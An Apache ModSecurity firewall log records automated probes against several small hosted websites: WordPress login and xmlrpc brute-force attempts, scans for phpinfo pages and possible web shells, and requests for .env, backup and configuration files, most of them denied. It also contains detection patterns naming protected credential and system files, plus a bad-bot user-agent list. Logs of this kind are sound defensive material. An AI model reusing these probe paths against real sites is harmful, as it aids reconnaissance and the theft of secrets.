[Tue May 26 13:47:16.096680 2026] [security2:error] [pid 555743:tid 555761] [remote 95.211.96.182:40676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.96.211.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVXC8jqAquC0YaxQjCiKgABYxE"]
[Tue May 26 13:47:16.150223 2026] [security2:error] [pid 555743:tid 555910] [client 4.201.75.230:5475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-admin/user/index.php"] [unique_id "ahVXDMjqAquC0YaxQjCiLwAAAS8"]
[Tue May 26 13:47:16.390136 2026] [security2:error] [pid 555743:tid 555894] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXDMjqAquC0YaxQjCiNQAAAR8"]
[Tue May 26 13:47:16.405145 2026] [security2:error] [pid 555743:tid 555946] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXC8jqAquC0YaxQjCiLAAAAVM"]
[Tue May 26 13:47:17.162185 2026] [security2:error] [pid 555743:tid 555886] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiWQAAARc"]
[Tue May 26 13:47:17.621420 2026] [security2:error] [pid 555743:tid 555878] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiXgAAAQ8"]
[Tue May 26 13:47:17.835569 2026] [security2:error] [pid 555743:tid 555912] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiWwAAATE"]
[Tue May 26 13:47:17.868707 2026] [security2:error] [pid 555743:tid 555945] [client 45.148.10.159:49598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/_phpinfo.php"] [unique_id "ahVXDcjqAquC0YaxQjCiZAAAAVI"]
[Tue May 26 13:47:17.918608 2026] [security2:error] [pid 544395:tid 544586] [client 208.91.198.85:14556] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXDRmrs7g3RMCdp8XtEgAAAD0"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:18.096997 2026] [security2:error] [pid 555743:tid 556000] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXDcjqAquC0YaxQjCiZQAAAYk"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:18.759565 2026] [security2:error] [pid 555743:tid 555924] [client 51.68.236.73:26217] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.midrivermarina.com"] [uri "/robots.txt"] [unique_id "ahVXDsjqAquC0YaxQjCihAAAAT0"]
[Tue May 26 13:47:18.759722 2026] [security2:error] [pid 555743:tid 555924] [client 51.68.236.73:26217] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.midrivermarina.com"] [uri "/robots.txt"] [unique_id "ahVXDsjqAquC0YaxQjCihAAAAT0"]
[Tue May 26 13:47:19.307964 2026] [security2:error] [pid 555743:tid 555991] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXDsjqAquC0YaxQjCihwAAAYA"]
[Tue May 26 13:47:19.633342 2026] [security2:error] [pid 544395:tid 544622] [client 4.201.75.230:5649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-conf.php"] [unique_id "ahVXDxmrs7g3RMCdp8XtLQAAAGE"]
[Tue May 26 13:47:20.220841 2026] [security2:error] [pid 555743:tid 555970] [client 123.16.107.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXD8jqAquC0YaxQjCikgAAAWs"]
[Tue May 26 13:47:20.633778 2026] [security2:error] [pid 555743:tid 555792] [remote 211.23.68.235:2385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVXEMjqAquC0YaxQjCiqwABRDA"]
[Tue May 26 13:47:20.708171 2026] [security2:error] [pid 555743:tid 555874] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXEMjqAquC0YaxQjCitAAAAQs"]
[Tue May 26 13:47:20.901701 2026] [security2:error] [pid 555743:tid 555887] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXEMjqAquC0YaxQjCirQAAARg"]
[Tue May 26 13:47:21.421629 2026] [security2:error] [pid 555743:tid 555898] [client 106.192.248.115:59903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXEcjqAquC0YaxQjCixQAAASM"]
[Tue May 26 13:47:21.421753 2026] [security2:error] [pid 555743:tid 555898] [client 106.192.248.115:59903] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXEcjqAquC0YaxQjCixQAAASM"]
[Tue May 26 13:47:21.601233 2026] [security2:error] [pid 555743:tid 555950] [client 45.148.10.159:47250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/_profiler/phpinfo/info.php"] [unique_id "ahVXEcjqAquC0YaxQjCiywAAAVc"]
[Tue May 26 13:47:22.442017 2026] [security2:error] [pid 555743:tid 555894] [client 45.148.10.159:47260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/_profiler/phpinfo/phpinfo.php"] [unique_id "ahVXEsjqAquC0YaxQjCi3gAAAR8"]
[Tue May 26 13:47:23.279177 2026] [security2:error] [pid 555743:tid 555909] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXE8jqAquC0YaxQjCi7AAAAS4"]
[Tue May 26 13:47:23.855343 2026] [security2:error] [pid 555743:tid 555933] [client 4.201.75.230:5494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-login.php"] [unique_id "ahVXE8jqAquC0YaxQjCi9gAAAUY"]
[Tue May 26 13:47:23.978087 2026] [security2:error] [pid 544395:tid 544652] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXExmrs7g3RMCdp8XtTwAAAH8"]
[Tue May 26 13:47:24.066231 2026] [security2:error] [pid 555743:tid 555897] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXE8jqAquC0YaxQjCjAQAAASI"]
[Tue May 26 13:47:24.474987 2026] [security2:error] [pid 555743:tid 555884] [client 45.148.10.159:47270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/awstats/.env"] [unique_id "ahVXFMjqAquC0YaxQjCjBQAAARU"]
[Tue May 26 13:47:24.744286 2026] [security2:error] [pid 555743:tid 555950] [client 45.148.10.159:47270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/conf/.env"] [unique_id "ahVXFMjqAquC0YaxQjCjDQAAAVc"]
[Tue May 26 13:47:25.074997 2026] [security2:error] [pid 555743:tid 555982] [client 45.148.10.159:47270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/cron/.env"] [unique_id "ahVXFcjqAquC0YaxQjCjDwAAAXc"]
[Tue May 26 13:47:25.090826 2026] [security2:error] [pid 555743:tid 555948] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXFMjqAquC0YaxQjCjCwAAAVU"]
[Tue May 26 13:47:25.201909 2026] [security2:error] [pid 544395:tid 544578] [client 66.249.66.33:64068] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.jhonparra.com"] [uri "/index.php"] [unique_id "ahVXFBmrs7g3RMCdp8XtVQAAADU"]
[Tue May 26 13:47:25.311464 2026] [security2:error] [pid 555743:tid 555949] [client 129.222.147.134:21915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXFcjqAquC0YaxQjCjEwAAAVY"]
[Tue May 26 13:47:25.311703 2026] [security2:error] [pid 555743:tid 555949] [client 129.222.147.134:21915] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXFcjqAquC0YaxQjCjEwAAAVY"]
[Tue May 26 13:47:26.054467 2026] [security2:error] [pid 555743:tid 555984] [client 192.95.82.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVXFcjqAquC0YaxQjCjFAAAAXk"]
[Tue May 26 13:47:26.065419 2026] [security2:error] [pid 555743:tid 555876] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/www/.env"] [unique_id "ahVXFsjqAquC0YaxQjCjJwAAAQ0"]
[Tue May 26 13:47:26.301885 2026] [security2:error] [pid 555743:tid 555969] [client 4.201.75.230:6098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/abc.php"] [unique_id "ahVXFsjqAquC0YaxQjCjKAAAAWo"]
[Tue May 26 13:47:26.370334 2026] [security2:error] [pid 555743:tid 555878] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/docker/.env"] [unique_id "ahVXFsjqAquC0YaxQjCjKwAAAQ8"]
[Tue May 26 13:47:26.672998 2026] [security2:error] [pid 555743:tid 555994] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/docker/app/.env"] [unique_id "ahVXFsjqAquC0YaxQjCjNQAAAYM"]
[Tue May 26 13:47:26.979355 2026] [security2:error] [pid 555743:tid 555904] [client 45.148.10.159:47276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/env.backup"] [unique_id "ahVXFsjqAquC0YaxQjCjOQAAASk"]
[Tue May 26 13:47:27.291321 2026] [security2:error] [pid 555743:tid 555882] [client 45.148.10.159:47276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/xampp/phpinfo.php"] [unique_id "ahVXF8jqAquC0YaxQjCjPgAAARM"]
[Tue May 26 13:47:27.658361 2026] [security2:error] [pid 555743:tid 555806] [remote 167.71.130.119:34634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVXF8jqAquC0YaxQjCjRwABHD4"]
[Tue May 26 13:47:28.179527 2026] [security2:error] [pid 555743:tid 555884] [client 4.201.75.230:6130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/abcd.php"] [unique_id "ahVXGMjqAquC0YaxQjCjVQAAARU"]
[Tue May 26 13:47:28.479170 2026] [security2:error] [pid 555743:tid 555939] [client 45.148.10.159:47290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/lara/info.php"] [unique_id "ahVXGMjqAquC0YaxQjCjXAAAAUw"]
[Tue May 26 13:47:28.918035 2026] [security2:error] [pid 555743:tid 555925] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXGMjqAquC0YaxQjCjWwAAAT4"]
[Tue May 26 13:47:29.580655 2026] [security2:error] [pid 544395:tid 544628] [client 45.148.10.159:56182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/lara/phpinfo.php"] [unique_id "ahVXGRmrs7g3RMCdp8XtfQAAAGc"]
[Tue May 26 13:47:30.535354 2026] [security2:error] [pid 544395:tid 544570] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXGhmrs7g3RMCdp8XthQAAAC0"]
[Tue May 26 13:47:30.708757 2026] [security2:error] [pid 544395:tid 544648] [client 45.148.10.159:56188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/laravel/info.php"] [unique_id "ahVXGhmrs7g3RMCdp8XtigAAAHs"]
[Tue May 26 13:47:31.631931 2026] [security2:error] [pid 555743:tid 555976] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/.vscode/.env"] [unique_id "ahVXG8jqAquC0YaxQjCjjgAAAXE"]
[Tue May 26 13:47:31.686907 2026] [security2:error] [pid 555743:tid 555941] [client 20.206.67.134:4972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXG8jqAquC0YaxQjCjjwAAAU4"], referer: www.google.com
[Tue May 26 13:47:31.687847 2026] [security2:error] [pid 544395:tid 544579] [client 20.206.67.134:4970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahVXGxmrs7g3RMCdp8XtkwAAADY"], referer: www.google.com
[Tue May 26 13:47:31.938026 2026] [security2:error] [pid 555743:tid 555880] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/js/.env"] [unique_id "ahVXG8jqAquC0YaxQjCjlQAAARE"]
[Tue May 26 13:47:31.954141 2026] [security2:error] [pid 544395:tid 544564] [client 20.206.67.134:4935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/otexajjd.php"] [unique_id "ahVXGxmrs7g3RMCdp8XtmwAAACc"], referer: www.google.com
[Tue May 26 13:47:31.979485 2026] [security2:error] [pid 555743:tid 555997] [client 106.192.248.115:60220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXG8jqAquC0YaxQjCjlgAAAYY"]
[Tue May 26 13:47:31.987257 2026] [security2:error] [pid 555743:tid 555997] [client 106.192.248.115:60220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXG8jqAquC0YaxQjCjlgAAAYY"]
[Tue May 26 13:47:32.284158 2026] [security2:error] [pid 555743:tid 555918] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/laravel/.env"] [unique_id "ahVXHMjqAquC0YaxQjCjogAAATc"]
[Tue May 26 13:47:32.531684 2026] [security2:error] [pid 555743:tid 555993] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXHMjqAquC0YaxQjCjnQAAAYI"]
[Tue May 26 13:47:32.592750 2026] [security2:error] [pid 555743:tid 555940] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/laravel/core/.env"] [unique_id "ahVXHMjqAquC0YaxQjCjpAAAAU0"]
